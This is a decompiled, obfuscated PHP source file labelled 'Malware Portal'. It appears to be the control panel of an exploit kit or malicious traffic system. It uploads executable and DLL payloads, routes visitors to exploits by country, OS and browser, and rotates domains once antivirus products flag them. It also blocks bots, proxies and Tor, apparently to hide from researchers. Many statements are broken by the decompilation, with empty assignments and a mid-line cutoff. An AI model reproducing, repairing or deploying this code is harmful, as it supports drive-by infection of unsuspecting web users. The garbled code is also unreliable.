Malware Portal

1. <?php
2. /**
3. *
4. * @ This file is created by DeZend.Org
5. * @ DeZend (PHP5 Decoder for ionCube Encoder)
6. *
7. * @ Version : 1.1.7.0
8. * @ Author : TuhanTS
9. * @ Release on : 25.02.2013
10. * @ Official site : http://DeZend.Org
11. *
12. */
13.  
14. function [obfuscated]($cbcbfgbbii, $bfdchdbag) {
15. $dgjafjhgbe = array( '\'', '"', '<', '>', '?' );
16. $bfdchdbag = ;
17. deahcjafcj( $dgjafjhgbe, '', $cbcbfgbbii );
18. $cbcbfgbbii = deahcjafcj( $dgjafjhgbe, '', $bfdchdbag );
19. Config::write( $cbcbfgbbii, $bfdchdbag );
20. }
21.  
22.  
23. if (chbhdajcge( './blocked' )) {
24. echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">Заблокировано из-за превышения суточного трафика. Обратитесь к администрации.<br/>Blocked due to exceeding the daily traffic. Contact the administration.';
25. exit( );
26. }
27.  
28.  
29. if (chbhdajcge( './baned' )) {
30. echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">Заблокировано из-за окончания срока. Обратитесь к администрации.<br/>Your account ended. Contact the administration.';
31. exit( );
32. }
33.  
34. efahchecg( E_ERROR );
35. ccdicfhfbc( 'display_errors', 0 );
36. dhhgjcbeeb( );
37. cbbdcjhahc( 'ROOT', './' );
38. cbbdcjhahc( 'AdminScript', beiicjjcdf( ddedjdfaei( $_SERVER['SCRIPT_NAME'] ) ) );
39. include_once( ROOT . 'config.php' );
40. include_once( ROOT . Config::get( 'LibDir' ) . '/template.php' );
41. include_once( ROOT . Config::get( 'LibDir' ) . '/logs.php' );
42. include_once( ROOT . Config::get( 'LibDir' ) . '/db.php' );
43. include_once( ROOT . Config::get( 'LibDir' ) . '/browser.php' );
44. include_once( ROOT . Config::get( 'LibDir' ) . '/files.php' );
45. include_once( ROOT . Config::get( 'LibDir' ) . '/threads.php' );
46. include_once( ROOT . Config::get( 'LibDir' ) . '/js.php' );
47. include_once( ROOT . Config::get( 'LibDir' ) . '/lang.php' );
48.  
49. if (Config::get( 'StatFileName' ) . '.php' == AdminScript) {
50. cbbdcjhahc( 'GUEST', 1 );
51. }
52. else {
53. cbbdcjhahc( 'GUEST', 0 );
54. }
55.  
56. $a = (isset( $_GET['a'] ) ? $_GET['a'] : '');
57.  
58. if ($a == '') {
59. $threadID = (isset( $_GET['ThreadID'] ) ? diaadjcgca( JS::unpack( $_GET['ThreadID'] ) ) : null);
60. $ruleID = (isset( $_GET['RuleID'] ) ? diaadjcgca( JS::unpack( $_GET['RuleID'] ) ) : null);
61.  
62. if (( isset( $_GET['data'] ) && $_GET['data'] == bcahiabhha( 'gewvewvewvwev' . $threadID . $ruleID . Config::get( 'AdminPass' ) . 'asdasdasd' ) )) {
63. $_SESSION['tmp_auth'] = 1;
64. }
65. else {
66. unset( $_SESSION[tmp_auth] );
67. }
68. }
69.  
70.  
71. if (( GUEST && !djgejchach( $a, array( '', 'img', 'css', 'js', 'reloadBlock' ) ) )) {
72. exit( );
73. }
74.  
75.  
76. if (( GUEST && !isset( $_SESSION['tmp_auth'] ) )) {
77. exit( );
78. }
79.  
80.  
81. if ($a == 'captcha') {
82. include( Config::get( 'LibDir' ) . '/kcaptcha/index.php' );
83. exit( );
84. }
85.  
86.  
87. if (( isset( $_POST['Action'] ) && $_POST['Action'] == 'Login' )) {
88. if (bcahiabhha( $_POST['Password'] ) == Config::get( 'AdminPass' )) {
89. if (( Config::get( 'NoCaptcha', 0 ) || ( !Config::get( 'NoCaptcha', 0 ) && ( isset( $_SESSION['captcha_keystring'] ) && $_SESSION['captcha_keystring'] === $_POST['Captcha'] ) ) )) {
90. $_SESSION['auth'] = 1;
91. Lang::setcurlang( ($_POST['Language'] == 'ru' ? 'ru' : 'en') );
92. eahcdihghj( 'Location: ' . AdminScript );
93. exit( );
94. }
95. }
96. }
97.  
98.  
99. if (( !GUEST && !isset( $_SESSION['auth'] ) )) {
100. Template::show( 'auth' );
101. exit( );
102. }
103.  
104. db::create( Config::get( 'MysqlHost' ), Config::get( 'MysqlUsername' ), Config::get( 'MysqlPassword' ), Config::get( 'MysqlDatabase' ) );
105.  
106. if ($a == '') {
107. Template::show( 'main_stat' );
108. }
109. else {
110. if ($a == 'files') {
111. Template::show( 'files' );
112. }
113. else {
114. if ($a == 'settings') {
115. Template::show( 'settings' );
116. }
117. else {
118. if ($a == 'security') {
119. Template::show( 'security' );
120. }
121. else {
122. if ($a == 'reloadBlock') {
123. $_SESSION['sDate'] = ($_GET['sDate'] == 'null' ? null : diaadjcgca( $_GET['sDate'] ));
124. $_SESSION['eDate'] = ($_GET['eDate'] == 'null' ? null : diaadjcgca( $_GET['eDate'] ));
125. $_SESSION['threadID'] = ($_GET['threadID'] == 'null' ? null : diaadjcgca( $_GET['threadID'] ));
126. $_SESSION['ruleID'] = ($_GET['ruleID'] == 'null' ? null : diaadjcgca( $_GET['ruleID'] ));
127.  
128. if (isset( $_GET['block'] )) {
129. $_GET['block'];
130. $b = ;
131.  
132. if (isset( $_GET['count'] )) {
133. [obfuscated]( $b . 'Limit', diaadjcgca( $_GET['count'] ) );
134. }
135.  
136.  
137. if (isset( $_GET['resort'] )) {
138. $name = $b . 'Sort';
139. $_GET['resort'];
140. $f = ;
141. $old = (isset( $_COOKIE[$name] ) ? $_COOKIE[$name] : 'Percent desc');
142. bhgfbedigj( ' ', $old )[1];
143. $v = ;
144. [0];
145. $n = ;
146.  
147. if ($n == $f) {
148. if ($v == 'desc') {
149. $v = 'asc';
150. }
151. else {
152. $v = 'desc';
153. }
154. }
155. else {
156. $f;
157. $n = ;
158. $v = 'desc';
159. }
160.  
161. dbiaghegdg( $name, $n . ' ' . $v, cjfacgeadg( ) + 3600 * 24 * 365 );
162. $_COOKIE[$name] = $n . ' ' . $v;
163. }
164.  
165.  
166. if (isset( $_GET['full'] )) {
167. $name = $b . 'Full';
168. dabagcadja( $_GET['full'] );
169. $f = ;
170. $old = (isset( $_COOKIE[$name] ) ? $_COOKIE[$name] : '');
171. Threads::filter( bhgfbedigj( ';;', $old ) );
172. $old = ;
173.  
174. if (djgejchach( $f, $old )) {
175. foreach ($old as ) {
176. [0];
177. [1];
178. $v = ;
179. $n = ;
180.  
181. if ($v == $f) {
182. unset( $old[$n] );
183. break;
184. }
185. }
186. }
187. else {
188. $old[] = $f;
189. }
190.  
191. bdddhdefdg( ';;', $old );
192. $new = ;
193. dbiaghegdg( $name, $new, cjfacgeadg( ) + 3600 * 24 * 365 );
194. $_COOKIE[$name] = $new;
195. }
196.  
197.  
198. if (( isset( $_GET['type'] ) && $_GET['type'] == 'blocked' )) {
199. Template::show( $b . '_bstat' );
200. }
201. else {
202. Template::show( $b . '_stat' );
203. }
204. }
205. else {
206. if (isset( $_GET['blocks'] )) {
207. $_GET['blocks'];
208. $b = ;
209. bhgfbedigj( ',', $b );
210. $s = ;
211. $ss = array( );
212. foreach ($s as ) {
213. [0];
214. $q = ;
215. dfcfgabgcj( );
216. Template::show( $q . '_stat' );
217. bfegieejch( );
218. $qq = ;
219. chcjgheihe( );
220. $ss[] = $qq;
221. }
222.  
223. echo bdddhdefdg( ':::', $ss );
224. }
225. }
226. }
227. else {
228. if ($a == 'domainEdit') {
229. Template::show( 'domainEdit' );
230. }
231. else {
232. if ($a == 'blocked') {
233. Template::show( 'blocked_stat' );
234. }
235. else {
236. if ($a == 'fileEdit') {
237. Template::show( 'fileEdit' );
238. }
239. else {
240. if ($a == 'threads') {
241. Template::show( 'threads' );
242. }
243. else {
244. if ($a == 'threadEdit') {
245. Template::show( 'threadEdit' );
246. }
247. else {
248. if ($a == 'ruleAdd') {
249. Template::show( 'ruleAdd' );
250. }
251. else {
252. if ($a == 'ruleEdit') {
253. Template::show( 'ruleEdit' );
254. }
255. else {
256. if ($a == 'blockConfig') {
257. Template::show( 'block_config' );
258. }
259. else {
260. if ($a == 'domains') {
261. Template::show( 'domains' );
262. }
263. else {
264. if ($a == 'versions') {
265. Template::show( 'versions' );
266. }
267. else {
268. if ($a == 'img') {
269. $_GET['img'];
270. $img = ;
271. deahcjafcj( array( '..', '/' ), '', $img );
272. $img = ;
273. $seconds_to_cache = 3600 * 24 * 365 * 10;
274. $ts = bjhbefadec( 'D, d M Y H:i:s', cjfacgeadg( ) + $seconds_to_cache ) . ' GMT';
275. eahcdihghj( '' . 'Expires: ' . $ts );
276. eahcdihghj( 'Pragma: cache' );
277. eahcdihghj( '' . 'Cache-Control: max-age=' . $seconds_to_cache );
278. fddeggjd( $img, PATHINFO_EXTENSION );
279. $ext = ;
280. eahcdihghj( 'Content-type: image/' . $ext );
281. eahcdihghj( 'Content-Encoding: gzip' );
282. cfhcaeigbc( Config::get( 'LibDir' ) . '/templates/img/' . $img );
283. $c = ;
284. echo ebghfaibcg( $c );
285. exit( );
286. }
287. else {
288. if ($a == 'css') {
289. $seconds_to_cache = 3600 * 24 * 365 * 10;
290. $ts = bjhbefadec( 'D, d M Y H:i:s', cjfacgeadg( ) + $seconds_to_cache ) . ' GMT';
291. eahcdihghj( '' . 'Expires: ' . $ts );
292. eahcdihghj( 'Pragma: cache' );
293. eahcdihghj( '' . 'Cache-Control: max-age=' . $seconds_to_cache );
294. eahcdihghj( 'Content-type: text/css' );
295. eahcdihghj( 'Content-Encoding: gzip' );
296. cfhcaeigbc( Config::get( 'LibDir' ) . '/templates/css/main.css' );
297. $c = ;
298. echo ebghfaibcg( deahcjafcj( '%%', AdminScript, $c ) );
299. exit( );
300. }
301. else {
302. if ($a == 'js') {
303. $seconds_to_cache = 3600 * 24 * 365 * 10;
304. $ts = bjhbefadec( 'D, d M Y H:i:s', cjfacgeadg( ) + $seconds_to_cache ) . ' GMT';
305. eahcdihghj( '' . 'Expires: ' . $ts );
306. eahcdihghj( 'Pragma: cache' );
307. eahcdihghj( '' . 'Cache-Control: max-age=' . $seconds_to_cache );
308. eahcdihghj( 'Content-Encoding: gzip' );
309. eahcdihghj( 'Content-type: text/javascript' );
310. $_GET['file'];
311. $file = ;
312. deahcjafcj( array( '..', '/' ), '', $file );
313. $file = ;
314. cfhcaeigbc( Config::get( 'LibDir' ) . '/templates/js/' . $file . '.js' );
315. $c = ;
316. deahcjafcj( '%%', AdminScript, $c );
317. $c = ;
318. dgdajjdbaa( '/%Lang.([^%]+)%/', $c, $arr );
319. foreach ($arr[1] as ) {
320. [0];
321. $a = ;
322. deahcjafcj( '%Lang.' . $a . '%', Lang::get( $a ), $c );
323. $c = ;
324. }
325.  
326. echo ebghfaibcg( $c );
327. exit( );
328. }
329. }
330. }
331. }
332. }
333. }
334. }
335. }
336. }
337. }
338. }
339. }
340. }
341. }
342. }
343. }
344. }
345. }
346.  
347.  
348. if ($a == 'logout') {
349. unset( $_SESSION[auth] );
350. eahcdihghj( 'Location: ' . AdminScript . '' );
351. exit( );
352. return 1;
353. }
354.  
355.  
356. if ($a == 'domainAdd') {
357. $id = (isset( $_GET['id'] ) ? diaadjcgca( $_GET['id'] ) : 0);
358. $arr = array( 'Domain' => dabagcadja( $_POST['Domain'] ), 'Status' => diaadjcgca( $_POST['Status'] ) );
359.  
360. if ($id == 0) {
361. bhgfbedigj( ' ', $_POST['Domain'] );
362. $d = ;
363. foreach ($d as ) {
364. [0];
365. $q = ;
366. baafbabacf( $q );
367. $q = ;
368.  
369. if ($q == '') {
370. continue;
371. }
372.  
373. $arr['Domain'] = $q;
374. db::insert( $arr, 'Domains' );
375. }
376. }
377. else {
378. db::update( $id, $arr, 'Domains' );
379. }
380.  
381. eahcdihghj( 'Location: ' . AdminScript . '?a=domains' );
382. exit( );
383. return 1;
384. }
385.  
386.  
387. if ($a == 'fileUpload') {
388. $_POST['Title'];
389. $title = ;
390.  
391. if (!isset( $_POST['FileUrl'] )) {
392. $_POST['FileUrl'] = '';
393. }
394.  
395.  
396. if (( isset( $_FILES['File'] ) && $_FILES['File']['tmp_name'] != '' )) {
397. cfhcaeigbc( $_FILES['File']['tmp_name'] );
398. $content = ;
399.  
400. if ($title == '') {
401. beafebcjaf( $_FILES['File']['name'], 0, ebjhdiggah( $_FILES['File']['name'], '.' ) );
402. $title = ;
403. }
404. }
405. else {
406. if (( isset( $_POST['FileUrl'] ) && $_POST['FileUrl'] != '' )) {
407. @cfhcaeigbc( $_POST['FileUrl'] );
408. $content = ;
409.  
410. if ($content === false) {
411. $content = '';
412. }
413.  
414.  
415. if ($title == '') {
416. $start = ebjhdiggah( $_POST['FileUrl'], '/' ) + 1;
417. beafebcjaf( $_POST['FileUrl'], $start, ebjhdiggah( $_POST['FileUrl'], '.' ) - $start );
418. $title = ;
419. }
420. }
421. else {
422. $content = '';
423. }
424. }
425.  
426. $fileID = (isset( $_GET['id'] ) ? diaadjcgca( $_GET['id'] ) : 0);
427.  
428. if (( $fileID == 0 && fgacdfafb( 'mime_content_type' ) )) {
429. $tmpname = Config::get( 'FilesDir' ) . '/test';
430. eejeehcch( $tmpname, $content );
431. daefebifii( $tmpname );
432. $mime = ;
433. cjjjjdejhg( $tmpname );
434.  
435. if (( $mime != 'application/octet-stream' && $mime != 'application/x-dosexec' )) {
436. echo '0';
437. exit( );
438. }
439. }
440.  
441.  
442. if ($title == '') {
443. beafebcjaf( bcahiabhha( cjfacgeadg( ) ), 0, 10 );
444. $title = ;
445. }
446.  
447. Files::upload( $title, $_POST['Comment'], $_POST['FileUrl'], (isset( $_POST['IsDLL'] ) ? 1 : 0), $content, $fileID, (isset( $_POST['ResetLoads'] ) ? 1 : 0), diaadjcgca( $_POST['UpdateInterval'] ), diaadjcgca( $_POST['CheckInterval'] ) );
448. echo '1';
449. exit( );
450. return 1;
451. }
452.  
453.  
454. if ($a == 'domainDelete') {
455. diaadjcgca( $_GET['id'] );
456. $id = ;
457. db::deletebyid( $id, 'Domains' );
458. eahcdihghj( 'Location: ' . AdminScript . '?a=domains' );
459. exit( );
460. return 1;
461. }
462.  
463.  
464. if ($a == 'fileDelete') {
465. diaadjcgca( $_GET['id'] );
466. $id = ;
467. Files::delete( $id );
468. eahcdihghj( 'Location: ' . AdminScript . '?a=files' );
469. exit( );
470. return 1;
471. }
472.  
473.  
474. if ($a == 'fileCheck') {
475. diaadjcgca( $_GET['id'] );
476. $id = ;
477. Files::check( $id );
478. $res = ;
479.  
480. if ($res != false) {
481. eahcdihghj( 'Location: ' . AdminScript . '?a=files&checkResult=' . diaadjcgca( $_GET['id'] ) );
482. }
483. else {
484. eahcdihghj( 'Location: ' . AdminScript . '?a=files&checkError' );
485. }
486.  
487. exit( );
488. return 1;
489. }
490.  
491.  
492. if ($a == 'threadSave') {
493. $threadID = (isset( $_GET['id'] ) ? diaadjcgca( $_GET['id'] ) : 0);
494. Threads::save( $threadID, $_POST['Title'], $_POST['Filename'], $_POST['Redirect'] );
495. $newThreadID = ;
496. eahcdihghj( 'Location: ' . AdminScript . '?a=threads' . ($threadID == 0 ? '&newThread=' . $newThreadID : '') );
497. exit( );
498. return 1;
499. }
500.  
501.  
502. if ($a == 'threadDelete') {
503. diaadjcgca( $_GET['id'] );
504. $id = ;
505. Threads::delete( $id );
506. eahcdihghj( 'Location: ' . AdminScript . '?a=threads' );
507. exit( );
508. return 1;
509. }
510.  
511.  
512. if ($a == 'ruleSave') {
513. $ruleID = (isset( $_GET['id'] ) ? diaadjcgca( $_GET['id'] ) : 0);
514. diaadjcgca( $_GET['threadID'] );
515. $threadID = ;
516.  
517. if (!isset( $_POST['TrafficType'] )) {
518. $_POST['TrafficType'] = 1;
519. }
520.  
521. $redirects = array( );
522.  
523. if (isset( $_POST['Redirects'] )) {
524. foreach ($_POST['Redirects'] as ) {
525. [0];
526. [1];
527. $title = ;
528. $i = ;
529. diaadjcgca( $_POST['RedirectLimit'][$i] );
530. $limit = ;
531.  
532. if ($limit == 0) {
533. $limit = 0 - 1;
534. }
535.  
536. $redirects[$title] = $limit;
537. }
538. }
539.  
540. Threads::saverule( $ruleID, $threadID, (isset( $_POST['Countries'] ) ? $_POST['Countries'] : array( )), (isset( $_POST['Oses'] ) ? $_POST['Oses'] : array( )), (isset( $_POST['Browsers'] ) ? $_POST['Browsers'] : array( )), (isset( $_POST['Exploits'] ) ? $_POST['Exploits'] : array( )), (isset( $_POST['Files'] ) ? $_POST['Files'] : array( )), $redirects, diaadjcgca( $_POST['RuleType'] ), diaadjcgca( $_POST['TrafficType'] ), $_POST['Dummy'], (isset( $_POST['DisableOnAV'] ) ? 1 : 0) );
541. eahcdihghj( 'Location: ' . AdminScript . '?a=threads' );
542. exit( );
543. return 1;
544. }
545.  
546.  
547. if ($a == 'ruleDelete') {
548. diaadjcgca( $_GET['id'] );
549. $id = ;
550. Threads::deleterule( $id );
551. eahcdihghj( 'Location: ' . AdminScript . '?a=threads' );
552. exit( );
553. return 1;
554. }
555.  
556.  
557. if ($a == 'rulesSort') {
558. Threads::sortrules( diaadjcgca( $_GET['threadID'] ), bhgfbedigj( ',', $_GET['order'] ) );
559. exit( );
560. return 1;
561. }
562.  
563.  
564. if ($a == 'saveInterval') {
565. diaadjcgca( $_GET['interval'] );
566. $i = ;
567. [obfuscated]( 'AutoreloadInterval', $i );
568. exit( );
569. return 1;
570. }
571.  
572.  
573. if ($a == 'threadFilename') {
574. echo Threads::getfilename( );
575. exit( );
576. return 1;
577. }
578.  
579.  
580. if ($a == 'getAPI') {
581. diaadjcgca( $_GET['id'] );
582. $id = ;
583. bcahiabhha( 'wqggewhewhewhweh' . $id );
584. $pass = ;
585. $_SERVER['SERVER_PORT'];
586. $port = ;
587.  
588. if ($port == 80) {
589. $port = '';
590. }
591. else {
592. $port = ':' . $port;
593. }
594.  
595. $f = 'http://' . $_SERVER['HTTP_HOST'] . $port . deahcjafcj( AdminScript, 'api.php', $_SERVER['PHP_SELF'] );
596. $f .= '?id=' . JS::pack( '' . $id ) . '&pass=' . $pass;
597. echo $f;
598. exit( );
599. return 1;
600. }
601.  
602.  
603. if ($a == 'domainsCheck') {
604. if (isset( $_GET['id'] )) {
605. db::select( 'select * from Domains where ID = ' . diaadjcgca( $_GET['id'] ) );
606. $domains = ;
607. }
608. else {
609. db::select( 'select * from Domains' );
610. $domains = ;
611. }
612.  
613. foreach ($domains as ) {
614. [0];
615. $f = ;
616. Files::checkdomain( $f );
617. }
618.  
619. db::query( 'update Domains set Status = 2 where AVCount >= ' . Config::get( 'DomainDisableCount' ) );
620. eahcdihghj( 'Location: ' . AdminScript . '?a=domains' );
621. exit( );
622. return 1;
623. }
624.  
625.  
626. if ($a == 'rulePlayPause') {
627. diaadjcgca( $_GET['id'] );
628. $id = ;
629. diaadjcgca( $_GET['threadID'] );
630. $threadID = ;
631. Threads::ruleplaypause( $threadID, $id );
632. eahcdihghj( 'Location: ' . AdminScript . '?a=threads' );
633. exit( );
634. return 1;
635. }
636.  
637.  
638. if ($a == 'geoipUpdate') {
639. $url = 'http://geolite.maxmind.com/download/geoip/database/GeoLiteCountry/GeoIP.dat.gz';
640. @cfhcaeigbc( $url );
641. $gzip = ;
642.  
643. if (!$gzip) {
644. exit( );
645. }
646.  
647. $stringu = ROOT . Config::get( 'FilesDir' ) . '/tmp.gz';
648. eejeehcch( $stringu, $gzip );
649. beafebcjaf( $gzip, 0 - 4 );
650. $rest = ;
651. cahgcdbejd( ehiaibjfa( 'V', $rest ) );
652. $GZFileSize = ;
653. $stringu;
654. $FileRead = ;
655. cgbghghaae( $FileRead, 'rb' );
656. $HandleRead = ;
657. dcdbbhgege( $HandleRead, $GZFileSize );
658. $ContentRead = ;
659. eahaeagg( $HandleRead );
660.  
661. if (1000 < bicdjbgi( $ContentRead )) {
662. eejeehcch( Config::get( 'LibDir' ) . '/data.dat', $ContentRead );
663. [obfuscated]( 'GeoIPUpdate', cjfacgeadg( ) );
664. }
665.  
666. exit( );
667. return 1;
668. }
669.  
670.  
671. if ($a == 'botBlock') {
672. [obfuscated]( 'blockBot', (isset( $_POST['blockBot'] ) ? 1 : 0) );
673. eahcdihghj( 'Location: ' . AdminScript . '?a=security' );
674. exit( );
675. return 1;
676. }
677.  
678.  
679. if ($a == 'allBlock') {
680. if (isset( $_POST['reset'] )) {
681. db::query( 'truncate table BlockAll' );
682. }
683. else {
684. [obfuscated]( 'blockAll', (isset( $_POST['blockAll'] ) ? 1 : 0) );
685. }
686.  
687. eahcdihghj( 'Location: ' . AdminScript . '?a=security' );
688. exit( );
689. return 1;
690. }
691.  
692.  
693. if ($a == 'antiProxy') {
694. if (isset( $_POST['reset'] )) {
695. db::query( 'truncate table ProxyBlock' );
696. }
697. else {
698. [obfuscated]( 'antiProxy', (isset( $_POST['antiProxy'] ) ? 1 : 0) );
699. }
700.  
701. eahcdihghj( 'Location: ' . AdminScript . '?a=security' );
702. exit( );
703. return 1;
704. }
705.  
706.  
707. if ($a == 'antiBot') {
708. if (isset( $_POST['reset'] )) {
709. db::query( 'truncate table BotBlock' );
710. }
711. else {
712. [obfuscated]( 'antiBot', (isset( $_POST['antiBot'] ) ? 1 : 0) );
713. }
714.  
715. eahcdihghj( 'Location: ' . AdminScript . '?a=security' );
716. exit( );
717. return 1;
718. }
719.  
720.  
721. if ($a == 'torBlock') {
722. if (isset( $_POST['update'] )) {
723. @cfhcaeigbc( 'http://www.dan.me.uk/torlist/' );
724. $list = ;
725.  
726. if (!$list) {
727. }
728. else {
729. deahcjafcj( '
730. ', '', $list );
731. $list = ;
732. bhgfbedigj( '
733. ', $list );
734. $list = ;
735. db::query( 'truncate table se_tor' );
736. foreach ($list as ) {
737. [0];
738. $l = ;
739. ieihdijii( $l );
740. $ip = ;
741. @caddegebjg( 'insert into se_tor (IP) values (' . $ip . ')' );
742. }
743.  
744. [obfuscated]( 'TorUpdate', cjfacgeadg( ) );
745. }
746. }
747. else {
748. [obfuscated]( 'blockTor', (isset( $_POST['blockTor'] ) ? 1 : 0) );
749. }
750.  
751. eahcdihghj( 'Location: ' . AdminScript . '?a=security' );
752. exit( );
753. return 1;
754. }
755.  
756.  
757. if ($a == 'referersBlock') {
758. [obfuscated]( 'blockReferer', (isset( $_POST['blockReferer'] ) ? 1 : 0) );
759. [obfuscated]( 'ReferersBlockType', diaadjcgca( $_POST['ReferersBlockType'] ) );
760. db::query( 'truncate table ReferersBlock' );
761. $_POST['ReferersBlock'];
762. $s = ;
763. bhgfbedigj( ':', $s );
764. $s = ;
765. foreach ($s as ) {
766. [0];
767. $a = ;
768.  
769. if ($a == '') {
770. continue;
771. }
772.  
773. deahcjafcj( 'http://', '', $a );
774. $a = ;
775. db::insert( array( 'Referer' => $a ), 'ReferersBlock' );
776. }
777.  
778. eahcdihghj( 'Location: ' . AdminScript . '?a=security' );
779. exit( );
780. return 1;
781. }
782.  
783.  
784. if ($a == 'settingsSave') {
785. if (( !isset( $_GET['name'] ) || !isset( $_GET['val'] ) )) {
786. exit( );
787. }
788.  
789. $_GET['name'];
790. $name = ;
791. $_GET['val'];
792. $val = ;
793.  
794. if ($name == 'DefaultLanguage') {
795. Lang::setcurlang( $val );
796. }
797.  
798.  
799. if ($name == 'AdminScript') {
800. deahcjafcj( array( '/', '\', '..', '.' ), '', $val );
801. $val = ;
802. [obfuscated]( 'MainFile', $val );
803. dcicfffcda( AdminScript, $val . '.php' );
804. eejeehcch( Config::get( 'StatFileName' ) . '.php', '<?php include(\'' . $val . '.php\');' );
805. }
806. else {
807. if ($name == 'AdminPass') {
808. if (bcahiabhha( $val ) != Config::get( 'AdminPass' )) {
809. echo '<img src="' . AdminScript . '?a=img&img=err.png"/> ' . Lang::get( 'WrongOld' );
810. exit( );
811. }
812.  
813. $_GET['new'];
814. $pass = ;
815. $_GET['new2'];
816. $pass2 = ;
817.  
818. if (( $pass == '' || $pass != $pass2 )) {
819. echo '<img src="' . AdminScript . '?a=img&img=err.png"/> ' . Lang::get( 'WrongDouble' );
820. exit( );
821. }
822.  
823. [obfuscated]( $name, bcahiabhha( $pass ) );
824. echo '<img src="' . AdminScript . '?a=img&img=accept.png"/> ' . Lang::get( 'Saved' );
825. }
826. else {
827. if ($name == 'WriteReferers') {
828. [obfuscated]( 'WriteReferers', diaadjcgca( $_GET['WriteReferers'] ) );
829. eahcdihghj( 'Location: ' . AdminScript . '?a=settings' );
830. exit( );
831. }
832. else {
833. if ($name == 'scanService') {
834. [obfuscated]( $name, $val );
835. [obfuscated]( 'scanLogin', $_GET['login'] );
836. [obfuscated]( 'scanPassword', $_GET['pass'] );
837. }
838. else {
839. if ($name == 'deleteAll') {
840. babachfjba( caddegebjg( 'select ifnull(sum(Hits),0)+(select count(*) from TMPLogs) as cnt from Logs where DataType=6' ) );
841. $r = ;
842. $r['cnt'];
843. $s = ;
844.  
845. if (!chbhdajcge( ROOT . 'tr_count.dat' )) {
846. $s2 = 2930;
847. }
848. &